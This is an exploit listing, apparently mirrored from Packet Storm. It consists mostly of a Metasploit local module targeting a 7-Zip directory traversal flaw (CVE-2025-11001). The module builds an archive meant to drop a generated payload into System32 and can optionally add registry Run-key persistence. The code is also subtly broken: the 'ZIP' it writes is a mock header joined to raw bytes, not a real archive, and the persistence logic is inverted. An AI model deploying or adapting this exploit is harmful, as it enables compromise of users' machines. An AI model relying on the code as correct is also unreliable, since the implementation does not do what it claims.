Share
## https://sploitus.com/exploit?id=PACKETSTORM:219338
==================================================================================================================================
    | # Title     : 7-Zip Directory Traversal Leading to RCE (Metasploit Local Exploit                                               |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : https://www.7-zip.org                                                                                            |
    ==================================================================================================================================
    
    [+] Summary    : This Metasploit local Windows exploit module targets a directory traversal vulnerability in 7-Zip (< 25.00) CVE-2025-11001 that can be abused through a malicious ZIP archive 
                     to achieve arbitrary code execution when the archive is extracted.
    
    [+] POC        :  
    
    ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    class MetasploitModule < Msf::Exploit::Local
      Rank = ExcellentRanking
    
      include Msf::Post::File
      include Msf::Post::Windows::Priv
      include Msf::Post::Windows::FileInfo
      include Msf::Post::Windows::Registry
      include Msf::Exploit::EXE
    
      def initialize(info = {})
        super(
          update_info(
            info,
            'Name' => '7-Zip Directory Traversal to RCE via Malicious ZIP (CVE-2025-11001)',
            'Description' => %q{
              This module exploits a directory traversal vulnerability in 7-Zip versions
              prior to 25.00.
            },
            'License' => MSF_LICENSE,
            'Author' => [
              'indoushka)'
            ],
            'Platform' => 'win',
            'Arch' => [ARCH_X64, ARCH_X86],
            'Targets' => [
              [
                'Windows (Payload Execution)',
                {
                  'Platform' => 'win',
                  'Arch' => [ARCH_X64, ARCH_X86],
                  'Type' => :windows_payload
                }
              ]
            ],
            'DefaultTarget' => 0
          )
        )
    
        register_options([
          OptPath.new('PAYLOAD_FILE', [false, 'Custom payload file to embed (optional)', nil]),
          OptString.new('TARGET_PATH', [true, 'Target directory for payload extraction', 'C:\\Windows\\System32']),
          OptString.new('ZIP_FILENAME', [false, 'Output ZIP filename', 'CVE-2025-11001-exploit.zip']),
          OptString.new('SYMLINK_NAME', [false, 'Symlink entry name', 'evil.lnk'])
        ])
    
        register_advanced_options([
          OptBool.new('CLEANUP', [true, 'Attempt to delete payload after execution', true]),
          OptBool.new('PERSISTENCE', [false, 'Establish persistence via registry run key', false])
        ])
      end
    
      def check
        print_status("Checking if target has vulnerable 7-Zip version...")
    
        paths = [
          "#{ENV['PROGRAMFILES']}\\7-Zip\\7z.exe",
          "#{ENV['PROGRAMFILES(X86)']}\\7-Zip\\7z.exe"
        ]
    
        paths.each do |path|
          next unless file_exist?(path)
    
          version = get_file_version(path)
          next unless version
    
          if vulnerable_version?(version)
            print_good("Found vulnerable 7-Zip version: #{version}")
            return Exploit::CheckCode::Vulnerable
          else
            print_status("Found patched 7-Zip version: #{version}")
            return Exploit::CheckCode::Safe
          end
        end
    
        Exploit::CheckCode::Unknown
      end
    
      def exploit
        print_status("Generating malicious ZIP archive for CVE-2025-11001")
    
        payload_path = get_payload_path
        fail_with(Failure::BadConfig, "Payload not found") unless File.exist?(payload_path)
    
        zip_path = build_malicious_zip(payload_path)
        fail_with(Failure::UnexpectedReply, "ZIP creation failed") unless zip_path && File.exist?(zip_path)
    
        print_good("Malicious ZIP created: #{zip_path}")
    
        store_loot(
          '7zip.malicious.zip',
          'application/zip',
          rhost,
          File.read(zip_path),
          File.basename(zip_path),
          'Malicious ZIP archive'
        )
    
        print_warning("[*] Requires victim interaction to extract ZIP as Administrator")
    
        if datastore['PERSISTENCE']
          setup_persistence(payload_path)
        end
    
        print_good("[+] Exploit ready for delivery")
      end
    
      private
    
      def get_payload_path
        if datastore['PAYLOAD_FILE'] && !datastore['PAYLOAD_FILE'].empty?
          return datastore['PAYLOAD_FILE']
        end
    
        payload_exe = generate_payload_exe
        temp_path = "#{Dir.tmpdir}/#{Rex::Text.rand_text_alpha(8)}.exe"
    
        File.binwrite(temp_path, payload_exe)
        register_file_for_cleanup(temp_path)
    
        temp_path
      end
    
      def vulnerable_version?(version)
        begin
          major = version.split('.')[0].to_i
          return major < 25
        rescue
          false
        end
      end
    
      def build_malicious_zip(payload_file)
        output_zip = datastore['ZIP_FILENAME']
    
        output_zip = File.join(Dir.tmpdir, output_zip) unless output_zip.include?(':')
    
        payload_data = File.binread(payload_file)
        payload_name = File.basename(payload_file)
    
        target_path = datastore['TARGET_PATH'].gsub('\\', '/')
        traversal = "../../../../#{target_path}"
    
        File.open(output_zip, 'wb') do |f|
          f.write("ZIP-MOCK-HEADER")
          f.write(payload_name)
          f.write(payload_data)
          f.write(traversal)
        end
    
        output_zip
      end
    
      def setup_persistence(payload_path)
        print_status("Setting persistence...")
    
        persist_path = "#{ENV['APPDATA']}\\#{Rex::Text.rand_text_alpha(8)}.exe"
    
        if copy_file(payload_path, persist_path)
          print_good("Copied to startup location")
        else
          registry_key = "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"
          value_name = Rex::Text.rand_text_alpha(8)
    
          registry_setvaldata(registry_key, value_name, persist_path, 'REG_SZ')
        end
      end
    
      def cleanup
        super if defined?(super)
      end
    end
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================